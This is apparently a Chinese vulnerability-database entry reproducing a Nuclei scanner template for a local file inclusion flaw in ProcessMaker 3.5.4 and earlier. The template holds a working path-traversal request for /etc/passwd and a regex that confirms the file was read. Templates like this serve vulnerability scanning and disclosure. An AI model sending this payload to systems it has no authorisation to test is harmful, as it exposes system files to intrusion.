processmaker-lfi: ProcessMaker <=3.5.4 - Local File Inclusion

日期: 2025-08-01 | 影响软件: ProcessMaker | POC: 已公开

漏洞描述

ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion.

PoC代码[已公开]

id: processmaker-lfi

info:
  name: ProcessMaker <=3.5.4 - Local File Inclusion
  author: KrE80r
  severity: high
  description: ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/50229
    - https://www.processmaker.com
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: processmaker,lfi,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "ProcessMaker"
          - "processmaker_login.png"
        condition: and

  - raw:
      - |
        GET /../../../..//etc/passwd HTTP/1.1
        Host: {{Hostname}}

    unsafe: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203d5870ffc2c2b960fdbc415f8416a9b9b2f56792a75808c6d6b884b4e1ed0fdd022100ed5355838a04329db06c52690c56d9b455519e0b5eec1ec2806d4b36cddac8ae:922c64590222798bb761d5b6d8e72950

相关漏洞推荐